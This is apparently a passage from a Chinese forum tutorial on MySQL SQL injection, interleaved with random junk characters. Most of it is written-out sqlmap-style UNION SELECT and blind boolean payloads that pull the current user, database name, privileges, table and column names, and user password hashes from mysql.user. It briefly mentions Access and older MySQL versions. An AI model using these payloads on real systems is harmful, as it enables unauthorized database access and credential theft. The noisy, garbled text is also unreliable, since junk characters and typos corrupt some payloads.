1 r- a9 G8 m8 z2 A5 CUNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(0x3a7075713a,IFNULL(C4 x8 o' @7 j& ?% K0 {
AST(CURRENT_USER() AS CHAR),0x20),0x3a6864623a), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NUL % k: ^2 p5 }* d% t8 S8 ML, NULL#, G* {) X! v" w' c& R0 Q
注意concat那里不是必须的,只是sqlmap为了自动攫取出数据加上的特征,下面语句类似,涉及基础性的知识,基友们自己去补吧。 ( _# M# j0 a# C; S ' J2 O* G3 t' b& {: D3 I获取数据库名* a! Z( `/ V/ Y: S+ T; O) j
0 N- ^8 v4 ^ s$ S& b* e6 l. M2 ^. l
UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(0x3a7075713a,IFNULL(CAST(DATABASE() AS CHAR),0x20),0x3a6864623a), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL#6 H+ _+ N8 F# O; t4 ^ w2 |
获取所有用户名 % p( q- y" W1 I2 A$ m" _/ s+ G ) K$ x E4 L U% q9 ?. N g
UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(0x3a7075713a,IFNULL(CAST(grantee AS CHAR),0x20),0x3a6864623a), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL FROM INFORMATION_SCHEMA.USER_PRIVILEGES# ! X$ E. Y; c) [' p# ~; {5 j& T查看当前用户权限 + x- r( ~4 g) o8 b. ^7 ] : x( N6 z: { [2 TUNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(0x3a7075713a,IFNULL(CAST(grantee AS CHAR),0x20),0x697461626a6e,IFNULL(CAST(privilege_type AS CHAR),0x20),0x3a6864623a), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL FROM INFORMATION_SCHEMA.USER_PRIVILEGES# # B. s" {* v$ ^3 S$ R: E尝试获取密码,当然需要有能读mysql数据库的权限 3 p; z$ V. b' [9 _! e- l$ _ Y- j $ D! Y! `/ ]0 z0 |% Q b
UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(0x3a7075713a,IFNULL(CAST(user AS CHAR),0x20),0x697461626a6e,IFNULL(CAST(password AS CHAR),0x20),0x3a6864623a), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL FROM mysql.user#6 r; d9 c K$ w/ z
获取表名,limit什么的自己搞啦( A: L9 ?/ V4 q j
; D$ S( E! L7 C* ~' _UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(0x3a7075713a,IFNULL(CAST(table_name AS CHAR),0x20),0x3a6864623a), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL FROM INFORMATION_SCHEMA.TABLES WHERE table_schema = 0x7061727474696d655f6a6f62#1 ? R0 G2 v0 y# ~) M
获取字段名及其类型 / X9 l8 W3 @9 N% C* ]7 T6 _' ?. }7 vUNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(0x3a7075713a,IFNULL(CAST(column_name AS CHAR),0×20),0x697461626a6e,IFNULL(CAST(column_type AS CHAR),0×20),0x3a6864623a),NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x61646d696e5f7461626c65 AND table_schema=0x7061727474696d655f6a6f62 AND (column_name=0x61646d696e6e616d65 OR column_name=0x70617373776f7264)#$ H, S- w# o6 `+ C
8 z6 \* t9 R7 C+ q
b注入,呵呵,除了当前用户,数据库,版本可以出来,而如果不能u,但存在数据的结构表,还是能苦逼出来,否则猜也不一定能猜到表和字段,内容自然也出不来,苦逼access啊。。。0 y& E; n. h7 {/ ^% L& k/ ^$ |; F8 T) u
. F3 p/ ~. b6 C! o0 u. b) P1 R如:2 O& b) r( l9 J' a' ~% o
获取当前用户名, V1 n, d4 X$ s6 [: _$ \
0 t- X, E7 w# J3 N+ B2 o
AND ORD(MID((IFNULL(CAST(CURRENT_USER() AS CHAR),0x20)),1,1)) > 116$ W y: y/ P7 ^, a4 q( J3 W# p
获取当前数据库# n) E6 c) X+ R$ |0 i9 c1 z
# i |) n5 S0 P6 s, ^AND ORD(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),6,1)) > 106 . K9 c" ^9 K7 U获取表名- X9 Y# g# [5 c" h) y0 V
]) c) U. e8 }( V# g( x3 n9 c
AND ORD(MID((SELECT IFNULL(CAST(COUNT(table_name) AS CHAR),0x20) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x7061727474696d655f6a6f62),1,1)) > 51* h4 Y3 j/ d: r9 P
获取字段名及其类型和爆内容就不说了,改改上面的就可以了。 * Z9 R( p9 h4 R/ |+ k2 F回到最苦逼的情况,无结构的,mysql版本<5.0,现在不多见了吧,还是看看语句。 \: ~8 I/ s. o* ]2 ?4 Q% k% U8 B
爆表 9 }% [ S* y/ }5 o* X3 y4 V # u; Z2 [/ \1 w3 K- {
AND EXISTS(select * from table)6 M+ n l" V! s) L7 u; @
爆字段 - C; R* @: N3 H5 ? 1 u4 ~* w2 H$ L7 U' p9 ]AND EXISTS(select pwd from table)) ? }# R7 [& Q7 ^( ?- V/ N& v
盲注的变化就比较多了,由于篇幅,只是举个例子而已。/ R# \1 ~! ?' \$ ^- \9 J/ Q/ w
: @/ m1 u! ^ _4 L/ K6 Z9 w
本来想把mssql和access都写上的,不过编辑得太累了,有时间再写吧,其实原理都差不多,今天就洗洗睡了吧。, [7 r. x$ j; q* V: W' g